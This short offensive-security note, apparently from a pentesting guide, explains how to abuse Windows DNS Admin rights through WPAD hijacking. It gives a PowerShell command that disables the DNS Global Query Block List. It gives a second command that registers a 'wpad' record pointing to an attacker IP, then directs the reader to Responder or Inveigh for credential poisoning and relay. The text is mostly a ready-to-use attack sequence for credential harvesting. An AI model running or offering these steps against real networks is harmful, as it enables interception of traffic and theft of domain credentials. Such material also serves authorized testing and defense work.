The Windows DNS Server Global Query Block List prevents resolution of selected hostnames—most notably WPAD, which is commonly targeted for hijacking.
WPAD (Web Proxy Auto‑Discovery Protocol) is a legacy mechanism that lets Windows automatically discover a proxy server on the network. Because of how it performs name resolution, it has become a high‑value abuse vector in both enterprise security and offensive testing.
When the objective is credential harvesting or relay attacks rather than executing a DLL, DNS Admin privileges can be leveraged to exploit WPAD.
Disable the global query block list:
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName <DC>
The block list prevents DNS from resolving dangerous, collision‑prone names such as:
- WPAD
- ISATAP
These names are blocked because they can be hijacked and used for credential theft, traffic interception, or misrouting.
Create the WPAD record:
Add-DnsServerResourceRecordA -Name wpad -ZoneName <domain.local> -ComputerName <DC> -IPv4Address <attacker_ip>
Then use a poisoning/relay tool such as Responder or Inveigh.